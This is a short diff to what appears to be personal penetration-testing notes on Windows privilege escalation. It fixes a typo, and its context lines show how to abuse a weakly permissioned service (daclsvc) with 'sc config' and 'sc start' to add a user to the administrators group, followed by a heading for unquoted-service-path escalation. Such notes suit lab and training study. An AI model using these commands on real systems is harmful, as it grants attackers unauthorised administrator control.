encryptedninja/command-center/Windows-Privesc/windows-privesc.md

 * `sc config daclsvc binpath= "net localgroup administrators user /add"`
 * it will say ***success!***
 * nothing will show up as of now but if we start the service: `sc start daclsvc` then `net localgroup administrators`
-* there will be a creater "user" withing the administrators group
+* there will be the created "user" withing the administrators group

 ### Escalation via Unquoted Service Path
 ### (Because it's not quoted off we can modify it and get malicious with it!)